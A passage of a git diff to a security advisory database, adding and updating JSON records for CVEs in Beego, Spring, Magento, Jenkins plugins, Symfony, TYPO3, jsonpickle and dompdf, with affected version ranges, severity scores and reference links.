"modified": "2024-02-01T21:16:11Z", + "published": "2022-05-24T22:00:36Z", + "aliases": [ + "CVE-2019-16355" + ], + "summary": "Incorrect Default Permissions in Beego", + "details": "The File Session Manager in Beego before 1.12.2 allows local users to read session files because of weak permissions for individual files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/beego/beego" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.12.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16355" + }, + { + "type": "WEB", + "url": "https://github.com/beego/beego/issues/3763" + }, + { + "type": "WEB", + "url": "https://github.com/beego/beego/pull/3975" + }, + { + "type": "WEB", + "url": "https://github.com/beego/beego/pull/3975/commits/f99cbe0fa40936f2f8dd28e70620c559b6e5e2fd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:16:11Z", + "nvd_published_at": "2019-09-16T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json b/advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json index 4dd18d8523e98..70a80bcf6b5a8 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json +++ b/advisories/github-reviewed/2022/05/GHSA-hh26-6xwr-ggv7/GHSA-hh26-6xwr-ggv7.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-beans" }, "ranges": [ { @@ -40,7 +40,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-beans" }, "ranges": [ { @@ -62,6 +62,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22970" }, + { + "type": "WEB", + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583" + }, { "type": "PACKAGE", "url": "https://github.com/spring-projects/spring-framework" diff --git a/advisories/github-reviewed/2022/05/GHSA-hhfw-xxhm-pf32/GHSA-hhfw-xxhm-pf32.json b/advisories/github-reviewed/2022/05/GHSA-hhfw-xxhm-pf32/GHSA-hhfw-xxhm-pf32.json index c682903d9bd04..f972bcd0bf9d0 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hhfw-xxhm-pf32/GHSA-hhfw-xxhm-pf32.json +++ b/advisories/github-reviewed/2022/05/GHSA-hhfw-xxhm-pf32/GHSA-hhfw-xxhm-pf32.json @@ -52,6 +52,10 @@ "type": "PACKAGE", "url": "https://github.com/ADOdb/ADOdb" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/adodb/adodb-php/CVE-2016-4855.yaml" + }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201701-59" diff --git a/advisories/github-reviewed/2022/05/GHSA-hmch-9947-82rj/GHSA-hmch-9947-82rj.json b/advisories/github-reviewed/2022/05/GHSA-hmch-9947-82rj/GHSA-hmch-9947-82rj.json index 19e3412a8c121..d15384850cfee 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hmch-9947-82rj/GHSA-hmch-9947-82rj.json +++ b/advisories/github-reviewed/2022/05/GHSA-hmch-9947-82rj/GHSA-hmch-9947-82rj.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8118" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8118.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-hppc-rpfp-r8qw/GHSA-hppc-rpfp-r8qw.json b/advisories/github-reviewed/2022/05/GHSA-hppc-rpfp-r8qw/GHSA-hppc-rpfp-r8qw.json index c36e5b99f44cc..34eab8a9fe29f 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hppc-rpfp-r8qw/GHSA-hppc-rpfp-r8qw.json +++ b/advisories/github-reviewed/2022/05/GHSA-hppc-rpfp-r8qw/GHSA-hppc-rpfp-r8qw.json @@ -78,6 +78,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7913" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7913.yaml" + }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-hrg3-4q56-p2q5/GHSA-hrg3-4q56-p2q5.json b/advisories/github-reviewed/2022/05/GHSA-hrg3-4q56-p2q5/GHSA-hrg3-4q56-p2q5.json index 1a423aa993ef0..4b166bd5276f6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hrg3-4q56-p2q5/GHSA-hrg3-4q56-p2q5.json +++ b/advisories/github-reviewed/2022/05/GHSA-hrg3-4q56-p2q5/GHSA-hrg3-4q56-p2q5.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7928" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7928.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json b/advisories/github-reviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json new file mode 100644 index 0000000000000..8d1ec0000ab9a --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-hrr3-7r5v-vxx5/GHSA-hrr3-7r5v-vxx5.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hrr3-7r5v-vxx5", + "modified": "2024-01-30T22:11:35Z", + "published": "2022-05-14T02:56:40Z", + "aliases": [ + "CVE-2018-1999035" + ], + "summary": "Jenkins Inedo BuildMaster Plugin globally and unconditionally disabled SSL/TLS certificate validation", + "details": "A man in the middle vulnerability exists in Jenkins Inedo BuildMaster Plugin 1.3 and earlier in BuildMasterConfiguration.java, BuildMasterConfig.java, BuildMasterApi.java that allows attackers to impersonate any service that Jenkins connects to.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.inedo.buildmaster:inedo-buildmaster" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.3" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999035" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-07-30/#SECURITY-935" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:11:35Z", + "nvd_published_at": "2018-08-01T13:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-hvcp-jvx5-4pmp/GHSA-hvcp-jvx5-4pmp.json b/advisories/github-reviewed/2022/05/GHSA-hvcp-jvx5-4pmp/GHSA-hvcp-jvx5-4pmp.json index 5780000065eb0..8fe69c9f67000 100644 --- a/advisories/github-reviewed/2022/05/GHSA-hvcp-jvx5-4pmp/GHSA-hvcp-jvx5-4pmp.json +++ b/advisories/github-reviewed/2022/05/GHSA-hvcp-jvx5-4pmp/GHSA-hvcp-jvx5-4pmp.json @@ -78,6 +78,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7923" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7923.yaml" + }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" + }, { "type": "WEB", "url": "https://web.archive.org/web/20211206084839/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-13" diff --git a/advisories/github-reviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json b/advisories/github-reviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json new file mode 100644 index 0000000000000..4e8b2057cca3d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-hw83-jpxr-g225/GHSA-hw83-jpxr-g225.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hw83-jpxr-g225", + "modified": "2024-01-30T22:25:07Z", + "published": "2022-05-13T01:31:34Z", + "aliases": [ + "CVE-2019-1003022" + ], + "summary": "Jenkins Monitoring Plugin vulnerable to Denial of service vulnerability", + "details": "A denial of service vulnerability exists in Jenkins Monitoring Plugin 1.74.0 and earlier in PluginImpl.java that allows attackers to kill threads running on the Jenkins master.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:monitoring" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.75.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.74.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003022" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1153" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:25:07Z", + "nvd_published_at": "2019-02-06T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json b/advisories/github-reviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json new file mode 100644 index 0000000000000..45e4c82848401 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-j2h6-j34w-g5vp/GHSA-j2h6-j34w-g5vp.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j2h6-j34w-g5vp", + "modified": "2024-01-30T22:40:52Z", + "published": "2022-05-14T03:45:49Z", + "aliases": [ + "CVE-2018-1000013" + ], + "summary": "CSRF vulnerability in Jenkins Release plugin", + "details": "Jenkins Release Plugin 2.9 and earlier did not require form submissions to be submitted via POST, resulting in a CSRF vulnerability allowing attackers to trigger release builds.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:release" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000013" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/102834" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:40:52Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-j5jh-hpr4-h332/GHSA-j5jh-hpr4-h332.json b/advisories/github-reviewed/2022/05/GHSA-j5jh-hpr4-h332/GHSA-j5jh-hpr4-h332.json index 6adaf942320c1..6cdbdcb05c37a 100644 --- a/advisories/github-reviewed/2022/05/GHSA-j5jh-hpr4-h332/GHSA-j5jh-hpr4-h332.json +++ b/advisories/github-reviewed/2022/05/GHSA-j5jh-hpr4-h332/GHSA-j5jh-hpr4-h332.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j5jh-hpr4-h332", - "modified": "2023-08-02T21:06:13Z", + "modified": "2024-02-08T19:16:23Z", "published": "2022-05-14T02:47:28Z", "aliases": [ "CVE-2015-8124" @@ -71,6 +71,101 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] } ], "references": [ @@ -82,10 +177,26 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/pull/16631" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2015-8124.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2015-8124.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2015-8124.yaml" + }, { "type": "WEB", "url": "https://symfony.com/blog/cve-2015-8124-session-fixation-in-the-remember-me-login-feature" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2015-8124" + }, { "type": "WEB", "url": "https://web.archive.org/web/20201209020014/http://www.securityfocus.com/archive/1/537183/100/0/threaded" diff --git a/advisories/github-reviewed/2022/05/GHSA-j63v-wcf9-c9hm/GHSA-j63v-wcf9-c9hm.json b/advisories/github-reviewed/2022/05/GHSA-j63v-wcf9-c9hm/GHSA-j63v-wcf9-c9hm.json index f14e173e42526..4a86561b6f3eb 100644 --- a/advisories/github-reviewed/2022/05/GHSA-j63v-wcf9-c9hm/GHSA-j63v-wcf9-c9hm.json +++ b/advisories/github-reviewed/2022/05/GHSA-j63v-wcf9-c9hm/GHSA-j63v-wcf9-c9hm.json @@ -78,10 +78,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8119" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8119.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json b/advisories/github-reviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json new file mode 100644 index 0000000000000..a301b166404f9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-j66q-qmrc-89rx/GHSA-j66q-qmrc-89rx.json @@ -0,0 +1,87 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j66q-qmrc-89rx", + "modified": "2024-02-01T20:58:40Z", + "published": "2022-05-24T17:36:44Z", + "aliases": [ + "CVE-2020-22083" + ], + "summary": "jsonpickle unsafe deserialization", + "details": "jsonpickle through 1.4.1 allows remote code execution during deserialization of a malicious payload through the `decode()` function. This CVE is disputed by the project author as intended functionality.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "jsonpickle" + }, + "ecosystem_specific": { + "affected_functions": [ + "jsonpickle.decode" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.4.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22083" + }, + { + "type": "WEB", + "url": "https://github.com/jsonpickle/jsonpickle/issues/332" + }, + { + "type": "WEB", + "url": "https://github.com/jsonpickle/jsonpickle/issues/332#issuecomment-747807494" + }, + { + "type": "WEB", + "url": "https://github.com/jsonpickle/jsonpickle/issues/335" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2020-22083" + }, + { + "type": "WEB", + "url": "https://gist.github.com/j0lt-github/bb543e77a1a10c33cb56cf23d0837874" + }, + { + "type": "WEB", + "url": "https://github.com/j0lt-github/python-deserialization-attack-payload-generator" + }, + { + "type": "PACKAGE", + "url": "https://github.com/jsonpickle/jsonpickle" + }, + { + "type": "WEB", + "url": "https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:58:40Z", + "nvd_published_at": "2020-12-17T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-j6c3-3c4w-qv8p/GHSA-j6c3-3c4w-qv8p.json b/advisories/github-reviewed/2022/05/GHSA-j6c3-3c4w-qv8p/GHSA-j6c3-3c4w-qv8p.json index 454f677933d4f..87b7bc7546e67 100644 --- a/advisories/github-reviewed/2022/05/GHSA-j6c3-3c4w-qv8p/GHSA-j6c3-3c4w-qv8p.json +++ b/advisories/github-reviewed/2022/05/GHSA-j6c3-3c4w-qv8p/GHSA-j6c3-3c4w-qv8p.json @@ -68,6 +68,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.2.0" + }, + { + "fixed": "6.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.3.1" + } + ] + } + ] } ], "references": [ @@ -95,6 +133,10 @@ "type": "WEB", "url": "https://github.com/moodle/moodle/commit/d65634044ebaa738f55bdec521beb42844d6916a" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2013-7341.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/moodle/moodle" @@ -103,6 +145,10 @@ "type": "WEB", "url": "https://moodle.org/mod/forum/discuss.php?d=256420" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2015-007" + }, { "type": "WEB", "url": "http://flash.flowplayer.org/documentation/version-history.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json b/advisories/github-reviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json new file mode 100644 index 0000000000000..13c570f77004e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jcmg-9rw5-9rm2/GHSA-jcmg-9rw5-9rm2.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcmg-9rw5-9rm2", + "modified": "2024-01-30T22:29:06Z", + "published": "2022-05-13T01:30:26Z", + "aliases": [ + "CVE-2018-1000426" + ], + "summary": "Stored XSS vulnerability in Jenkins Git Changelog Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins Git Changelog Plugin 2.6 and earlier in GitChangelogSummaryDecorator/summary.jelly, GitChangelogLeftsideBuildDecorator/badge.jelly, GitLogJiraFilterPostPublisher/config.jelly, GitLogBasicChangelogPostPublisher/config.jelly that allows attackers able to control the Git history parsed by the plugin to have Jenkins render arbitrary HTML on some pages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "de.wellnerbou.jenkins:git-changelog" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.6" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000426" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1122" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/106532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:28:55Z", + "nvd_published_at": "2019-01-09T23:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json b/advisories/github-reviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json new file mode 100644 index 0000000000000..15b43bb6b870d --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jfj9-7j5w-6xgx/GHSA-jfj9-7j5w-6xgx.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfj9-7j5w-6xgx", + "modified": "2024-01-30T22:36:33Z", + "published": "2022-05-14T03:46:09Z", + "aliases": [ + "CVE-2018-1000009" + ], + "summary": "XXE vulnerability in Jenkins Checkstyle Plugin", + "details": "Jenkins Checkstyle Plugin 3.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:checkstyle" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.50" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000009" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:33Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-jjwj-w3gc-gcw4/GHSA-jjwj-w3gc-gcw4.json b/advisories/github-reviewed/2022/05/GHSA-jjwj-w3gc-gcw4/GHSA-jjwj-w3gc-gcw4.json index 76217e0169bdc..b76f24bca77db 100644 --- a/advisories/github-reviewed/2022/05/GHSA-jjwj-w3gc-gcw4/GHSA-jjwj-w3gc-gcw4.json +++ b/advisories/github-reviewed/2022/05/GHSA-jjwj-w3gc-gcw4/GHSA-jjwj-w3gc-gcw4.json @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.6" }, { "fixed": "0.6.2" @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-5013" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2014-5013.yaml" + }, { "type": "WEB", "url": "https://github.com/dompdf/dompdf/compare/v0.6.1...v0.6.2" diff --git a/advisories/github-reviewed/2022/05/GHSA-jjx5-fq5g-8xpc/GHSA-jjx5-fq5g-8xpc.json b/advisories/github-reviewed/2022/05/GHSA-jjx5-fq5g-8xpc/GHSA-jjx5-fq5g-8xpc.json index a4034071ef03d..a8caf72f1397d 100644 --- a/advisories/github-reviewed/2022/05/GHSA-jjx5-fq5g-8xpc/GHSA-jjx5-fq5g-8xpc.json +++ b/advisories/github-reviewed/2022/05/GHSA-jjx5-fq5g-8xpc/GHSA-jjx5-fq5g-8xpc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jjx5-fq5g-8xpc", - "modified": "2023-07-31T23:05:36Z", + "modified": "2024-02-08T19:37:28Z", "published": "2022-05-17T03:54:47Z", "aliases": [ "CVE-2016-1902" @@ -15,6 +15,101 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.37" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.9" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", @@ -25,7 +120,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.3.0" }, { "fixed": "2.3.37" @@ -44,7 +139,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.6" + "introduced": "2.4.0" }, { "fixed": "2.6.13" @@ -63,7 +158,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.7" + "introduced": "2.7.0" }, { "fixed": "2.7.9" @@ -82,6 +177,22 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/pull/17359" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-core/CVE-2016-1902.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2016-1902.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2016-1902.yaml" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2016-1902" + }, { "type": "WEB", "url": "https://www.landaire.net/blog/cve-2016-1902-symfony-securerandom/" diff --git a/advisories/github-reviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json b/advisories/github-reviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json new file mode 100644 index 0000000000000..30a591836a932 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-jp4r-pf5r-4wg8/GHSA-jp4r-pf5r-4wg8.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jp4r-pf5r-4wg8", + "modified": "2024-01-30T22:27:38Z", + "published": "2022-05-13T01:25:43Z", + "aliases": [ + "CVE-2019-1003080" + ], + "summary": "CSRF vulnerability in Jenkins OpenShift Deployer Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins OpenShift Deployer Plugin in the DeployApplication.DeployApplicationDescriptor#doCheckLogin form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + 